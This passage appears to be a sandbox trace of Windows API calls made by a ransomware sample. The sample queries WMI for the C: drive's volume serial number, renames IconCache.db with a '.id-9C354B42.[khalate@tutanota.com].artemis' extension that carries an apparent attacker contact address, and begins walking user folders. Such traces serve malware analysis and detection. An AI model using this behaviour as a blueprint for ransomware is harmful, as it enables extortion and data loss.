[7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x71ee9e0 | out: ppv=0x71ee9e0*=0x6737078) returned 0x0 [0200.948] WbemDefPath:IUnknown:QueryInterface (in: This=0x6737078, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x71eebf8 | out: ppvObject=0x71eebf8*=0x0) returned 0x80004002 [0200.948] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6737078, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71eec0c | out: ppvObject=0x71eec0c*=0x6738bd0) returned 0x0 [0200.948] WbemDefPath:IUnknown:Release (This=0x6737078) returned 0x0 [0200.948] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738bd0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71ee82c | out: ppvObject=0x71ee82c*=0x6738bd0) returned 0x0 [0200.948] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738bd0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x71ee7e8 | out: ppvObject=0x71ee7e8*=0x0) returned 0x80004002 [0200.948] WbemDefPath:IUnknown:AddRef (This=0x6738bd0) returned 0x3 [0200.948] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738bd0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x71ee144 | out: ppvObject=0x71ee144*=0x0) returned 0x80004002 [0200.948] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738bd0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x71ee0f4 | out: ppvObject=0x71ee0f4*=0x0) returned 0x80004002 [0200.948] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738bd0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71ee100 | out: ppvObject=0x71ee100*=0x77c0d8) returned 0x0 [0200.948] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x77c0d8, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x71ee108 | out: pCid=0x71ee108*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0200.948] WbemDefPath:IUnknown:Release (This=0x77c0d8) returned 0x3 [0200.948] CoGetContextToken (in: pToken=0x71ee160 | out: pToken=0x71ee160) returned 0x0 [0200.949] CoGetContextToken (in: pToken=0x71ee568 | out: pToken=0x71ee568) returned 0x0 [0200.949] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738bd0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71ee5f8 | out: ppvObject=0x71ee5f8*=0x0) returned 0x80004002 [0200.949] WbemDefPath:IUnknown:Release (This=0x6738bd0) returned 0x2 [0200.949] WbemDefPath:IUnknown:Release (This=0x6738bd0) returned 0x1 [0200.949] CoGetContextToken (in: pToken=0x71eeef0 | out: pToken=0x71eeef0) returned 0x0 [0200.949] CoGetContextToken (in: pToken=0x71eee50 | out: pToken=0x71eee50) returned 0x0 [0200.949] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738bd0, riid=0x71eef20*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x71eef1c | out: ppvObject=0x71eef1c*=0x6738bd0) returned 0x0 [0200.949] WbemDefPath:IUnknown:AddRef (This=0x6738bd0) returned 0x3 [0200.949] WbemDefPath:IUnknown:Release (This=0x6738bd0) returned 0x2 [0200.949] WbemDefPath:IWbemPath:SetText (This=0x6738bd0, uMode=0x4, pszPath="\\\\.\\root\\cimv2") returned 0x0 [0200.949] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738bd0, puCount=0x71ef0a0 | out: puCount=0x71ef0a0*=0x2) returned 0x0 [0200.949] WbemDefPath:IWbemPath:GetText (in: This=0x6738bd0, lFlags=4, puBuffLength=0x71ef09c*=0x0, pszText=0x0 | out: puBuffLength=0x71ef09c*=0xf, pszText=0x0) returned 0x0 [0200.949] WbemDefPath:IWbemPath:GetText (in: This=0x6738bd0, lFlags=4, puBuffLength=0x71ef09c*=0xf, pszText="00000000000000" | out: puBuffLength=0x71ef09c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0200.949] CoGetObjectContext (in: riid=0x339b9ac*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x71ef0a0 | out: ppv=0x71ef0a0*=0x72015c) returned 0x0 [0200.949] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x71ef098 | out: pAptType=0x71ef098*=1) returned 0x0 [0200.949] IUnknown:QueryInterface (in: This=0x72015c, riid=0x339b994*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x71ef09c | out: ppvObject=0x71ef09c*=0x0) returned 0x80004002 [0200.949] IUnknown:Release (This=0x72015c) returned 0x1 [0200.950] CoGetClassObject (in: rclsid=0x7588d4*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x71eecc0 | out: ppv=0x71eecc0*=0x672f328) returned 0x0 [0200.950] WbemLocator:IUnknown:QueryInterface (in: This=0x672f328, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x71eeed8 | out: ppvObject=0x71eeed8*=0x0) returned 0x80004002 [0200.951] WbemLocator:IClassFactory:CreateInstance (in: This=0x672f328, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71eeeec | out: ppvObject=0x71eeeec*=0x6737038) returned 0x0 [0200.951] WbemLocator:IUnknown:Release (This=0x672f328) returned 0x0 [0200.951] WbemLocator:IUnknown:QueryInterface (in: This=0x6737038, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71eeb0c | out: ppvObject=0x71eeb0c*=0x6737038) returned 0x0 [0200.951] WbemLocator:IUnknown:QueryInterface (in: This=0x6737038, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x71eeac8 | out: ppvObject=0x71eeac8*=0x0) returned 0x80004002 [0200.951] WbemLocator:IUnknown:AddRef (This=0x6737038) returned 0x3 [0200.951] WbemLocator:IUnknown:QueryInterface (in: This=0x6737038, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x71ee424 | out: ppvObject=0x71ee424*=0x0) returned 0x80004002 [0200.951] WbemLocator:IUnknown:QueryInterface (in: This=0x6737038, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x71ee3d4 | out: ppvObject=0x71ee3d4*=0x0) returned 0x80004002 [0200.951] WbemLocator:IUnknown:QueryInterface (in: This=0x6737038, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71ee3e0 | out: ppvObject=0x71ee3e0*=0x0) returned 0x80004002 [0200.951] CoGetContextToken (in: pToken=0x71ee440 | out: pToken=0x71ee440) returned 0x0 [0200.951] CoGetContextToken (in: pToken=0x71ee848 | out: pToken=0x71ee848) returned 0x0 [0200.951] WbemLocator:IUnknown:QueryInterface (in: This=0x6737038, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71ee8d8 | out: ppvObject=0x71ee8d8*=0x0) returned 0x80004002 [0200.951] WbemLocator:IUnknown:Release (This=0x6737038) returned 0x2 [0200.951] WbemLocator:IUnknown:Release (This=0x6737038) returned 0x1 [0200.952] CoGetContextToken (in: pToken=0x71eeeb8 | out: pToken=0x71eeeb8) returned 0x0 [0200.952] CoGetContextToken (in: pToken=0x71eee18 | out: pToken=0x71eee18) returned 0x0 [0200.952] WbemLocator:IUnknown:QueryInterface (in: This=0x6737038, riid=0x71eeee8*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x71eeee4 | out: ppvObject=0x71eeee4*=0x6737038) returned 0x0 [0200.952] WbemLocator:IUnknown:AddRef (This=0x6737038) returned 0x3 [0200.952] WbemLocator:IUnknown:Release (This=0x6737038) returned 0x2 [0200.952] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738bd0, puCount=0x71ef07c | out: puCount=0x71ef07c*=0x2) returned 0x0 [0200.952] WbemDefPath:IWbemPath:GetText (in: This=0x6738bd0, lFlags=8, puBuffLength=0x71ef078*=0x0, pszText=0x0 | out: puBuffLength=0x71ef078*=0xf, pszText=0x0) returned 0x0 [0200.952] WbemDefPath:IWbemPath:GetText (in: This=0x6738bd0, lFlags=8, puBuffLength=0x71ef078*=0xf, pszText="00000000000000" | out: puBuffLength=0x71ef078*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0200.952] CoCreateInstance (in: rclsid=0x745f1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x745f12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x71eef54 | out: ppv=0x71eef54*=0x6737068) returned 0x0 [0200.952] WbemLocator:IWbemLocator:ConnectServer (in: This=0x6737068, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x71eefe8 | out: ppNamespace=0x71eefe8*=0x674820c) returned 0x0 [0201.959] WbemLocator:IUnknown:QueryInterface (in: This=0x674820c, riid=0x745f1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71eee84 | out: ppvObject=0x71eee84*=0x780be4) returned 0x0 [0201.959] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x780be4, pProxy=0x674820c, pAuthnSvc=0x71eeed4, pAuthzSvc=0x71eeed0, pServerPrincName=0x71eeec8, pAuthnLevel=0x71eeecc, pImpLevel=0x71eeebc, pAuthInfo=0x71eeec0, pCapabilites=0x71eeec4 | out: pAuthnSvc=0x71eeed4*=0xa, pAuthzSvc=0x71eeed0*=0x0, pServerPrincName=0x71eeec8, pAuthnLevel=0x71eeecc*=0x6, pImpLevel=0x71eeebc*=0x2, pAuthInfo=0x71eeec0, pCapabilites=0x71eeec4*=0x1) returned 0x0 [0201.959] WbemLocator:IUnknown:Release (This=0x780be4) returned 0x1 [0201.959] WbemLocator:IUnknown:QueryInterface (in: This=0x674820c, riid=0x745f10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71eee78 | out: ppvObject=0x71eee78*=0x780c04) returned 0x0 [0201.959] WbemLocator:IUnknown:QueryInterface (in: This=0x674820c, riid=0x745f1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71eee74 | out: ppvObject=0x71eee74*=0x780be4) returned 0x0 [0201.959] WbemLocator:IClientSecurity:SetBlanket (This=0x780be4, pProxy=0x674820c, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0202.071] WbemLocator:IUnknown:Release (This=0x780be4) returned 0x2 [0202.072] WbemLocator:IUnknown:Release (This=0x780c04) returned 0x1 [0202.072] CoTaskMemFree (pv=0x77dde8) [0202.072] WbemLocator:IUnknown:Release (This=0x6737068) returned 0x0 [0202.072] WbemLocator:IUnknown:QueryInterface (in: This=0x674820c, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71eea74 | out: ppvObject=0x71eea74*=0x780c04) returned 0x0 [0202.072] WbemLocator:IUnknown:QueryInterface (in: This=0x780c04, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x71eea30 | out: ppvObject=0x71eea30*=0x0) returned 0x80004002 [0202.372] WbemLocator:IUnknown:QueryInterface (in: This=0x780c04, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x71ee84c | out: ppvObject=0x71ee84c*=0x0) returned 0x80004002 [0202.373] WbemLocator:IUnknown:AddRef (This=0x780c04) returned 0x3 [0202.373] WbemLocator:IUnknown:QueryInterface (in: This=0x780c04, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x71ee38c | out: ppvObject=0x71ee38c*=0x0) returned 0x80004002 [0202.373] WbemLocator:IUnknown:QueryInterface (in: This=0x780c04, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x71ee33c | out: ppvObject=0x71ee33c*=0x0) returned 0x80004002 [0202.373] WbemLocator:IUnknown:QueryInterface (in: This=0x780c04, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71ee348 | out: ppvObject=0x71ee348*=0x780b64) returned 0x0 [0202.374] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x780b64, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x71ee350 | out: pCid=0x71ee350*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0202.374] WbemLocator:IUnknown:Release (This=0x780b64) returned 0x3 [0202.374] CoGetContextToken (in: pToken=0x71ee3a8 | out: pToken=0x71ee3a8) returned 0x0 [0202.374] CoGetContextToken (in: pToken=0x71ee7b0 | out: pToken=0x71ee7b0) returned 0x0 [0202.374] WbemLocator:IUnknown:QueryInterface (in: This=0x780c04, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71ee840 | out: ppvObject=0x71ee840*=0x780bec) returned 0x0 [0202.374] WbemLocator:IRpcOptions:Query (in: This=0x780bec, pPrx=0x780c04, dwProperty=2, pdwValue=0x71ee868 | out: pdwValue=0x71ee868) returned 0x80004002 [0202.374] WbemLocator:IUnknown:Release (This=0x780bec) returned 0x3 [0202.374] WbemLocator:IUnknown:Release (This=0x780c04) returned 0x2 [0202.374] CoGetContextToken (in: pToken=0x71eed88 | out: pToken=0x71eed88) returned 0x0 [0202.374] CoGetContextToken (in: pToken=0x71eece8 | out: pToken=0x71eece8) returned 0x0 [0202.374] WbemLocator:IUnknown:QueryInterface (in: This=0x780c04, riid=0x71eedb8*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x71eedb4 | out: ppvObject=0x71eedb4*=0x674820c) returned 0x0 [0202.374] WbemLocator:IUnknown:AddRef (This=0x674820c) returned 0x4 [0202.374] WbemLocator:IUnknown:Release (This=0x674820c) returned 0x3 [0202.374] WbemLocator:IUnknown:Release (This=0x674820c) returned 0x2 [0202.374] SysStringLen (param_1=0x0) returned 0x0 [0202.374] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738690, puCount=0x71ef14c | out: puCount=0x71ef14c*=0x0) returned 0x0 [0202.374] WbemDefPath:IWbemPath:GetText (in: This=0x6738690, lFlags=2, puBuffLength=0x71ef148*=0x0, pszText=0x0 | out: puBuffLength=0x71ef148*=0x20, pszText=0x0) returned 0x0 [0202.374] WbemDefPath:IWbemPath:GetText (in: This=0x6738690, lFlags=2, puBuffLength=0x71ef148*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x71ef148*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0202.374] CoGetContextToken (in: pToken=0x71eedb8 | out: pToken=0x71eedb8) returned 0x0 [0202.374] WbemLocator:IUnknown:AddRef (This=0x780c04) returned 0x3 [0202.374] WbemLocator:IUnknown:QueryInterface (in: This=0x780c04, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71eec4c | out: ppvObject=0x71eec4c*=0x780c04) returned 0x0 [0202.375] WbemLocator:IUnknown:Release (This=0x780c04) returned 0x3 [0202.375] WbemLocator:IUnknown:Release (This=0x780c04) returned 0x2 [0202.375] WbemDefPath:IWbemPath:GetText (in: This=0x6738690, lFlags=2, puBuffLength=0x71ef150*=0x0, pszText=0x0 | out: puBuffLength=0x71ef150*=0x20, pszText=0x0) returned 0x0 [0202.375] WbemDefPath:IWbemPath:GetText (in: This=0x6738690, lFlags=2, puBuffLength=0x71ef150*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x71ef150*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0202.375] IWbemServices:GetObject (in: This=0x674820c, strObjectPath="win32_logicaldisk.deviceid=\"C:\"", lFlags=0, pCtx=0x0, ppObject=0x71ef104*=0x0, ppCallResult=0x0 | out: ppObject=0x71ef104*=0x673b468, ppCallResult=0x0) returned 0x0 [0202.773] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738bd0, puCount=0x71ef104 | out: puCount=0x71ef104*=0x2) returned 0x0 [0202.773] WbemDefPath:IWbemPath:GetText (in: This=0x6738bd0, lFlags=4, puBuffLength=0x71ef100*=0x0, pszText=0x0 | out: puBuffLength=0x71ef100*=0xf, pszText=0x0) returned 0x0 [0202.773] WbemDefPath:IWbemPath:GetText (in: This=0x6738bd0, lFlags=4, puBuffLength=0x71ef100*=0xf, pszText="00000000000000" | out: puBuffLength=0x71ef100*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0202.774] IWbemClassObject:Get (in: This=0x673b468, wszName="VolumeSerialNumber", lFlags=0, pVal=0x71ef100*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x34f9af0*=0, plFlavor=0x34f9af4*=0 | out: pVal=0x71ef100*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x34f9af0*=8, plFlavor=0x34f9af4*=0) returned 0x0 [0202.774] SysStringByteLen (bstr="9C354B42") returned 0x10 [0202.774] SysStringByteLen (bstr="9C354B42") returned 0x10 [0202.774] IWbemClassObject:Get (in: This=0x673b468, wszName="VolumeSerialNumber", lFlags=0, pVal=0x71ef108*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x34f9af0*=8, plFlavor=0x34f9af4*=0 | out: pVal=0x71ef108*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x34f9af0*=8, plFlavor=0x34f9af4*=0) returned 0x0 [0202.774] SysStringByteLen (bstr="9C354B42") returned 0x10 [0202.774] SysStringByteLen (bstr="9C354B42") returned 0x10 [0202.774] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\IconCache.db", nBufferLength=0x105, lpBuffer=0x71eed08, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\IconCache.db", lpFilePart=0x0) returned 0x38 [0202.774] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\IconCache.db.id-9C354B42.[khalate@tutanota.com].artemis", nBufferLength=0x105, lpBuffer=0x71eed08, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\IconCache.db.id-9C354B42.[khalate@tutanota.com].artemis", lpFilePart=0x0) returned 0x63 [0202.774] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x71ef168) returned 1 [0202.774] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\IconCache.db" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\iconcache.db"), fInfoLevelId=0x0, lpFileInformation=0x71ef1e4 | out: lpFileInformation=0x71ef1e4*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0x28f14980, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f14980, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x8de8eaa0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x126da7)) returned 1 [0202.775] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x71ef164) returned 1 [0202.775] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\IconCache.db" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\iconcache.db"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\IconCache.db.id-9C354B42.[khalate@tutanota.com].artemis" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\iconcache.db.id-9c354b42.[khalate@tutanota.com].artemis")) returned 1 [0202.776] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x71ef29c) returned 1 [0202.776] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe", nBufferLength=0x105, lpBuffer=0x71eeda4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe", lpFilePart=0x0) returned 0x31 [0202.776] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\", nBufferLength=0x105, lpBuffer=0x71eed78, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\", lpFilePart=0x0) returned 0x32 [0202.776] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\*", lpFindFileData=0x71eefc4 | out: lpFindFileData=0x71eefc4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd72eaa0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd72eaa0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x77b430 [0202.777] FindNextFileW (in: hFindFile=0x77b430, lpFindFileData=0x71eefd4 | out: lpFindFileData=0x71eefd4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd72eaa0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd72eaa0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0202.777] FindNextFileW (in: hFindFile=0x77b430, lpFindFileData=0x71eefd4 | out: lpFindFileData=0x71eefd4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd72eaa0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd72eaa0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, 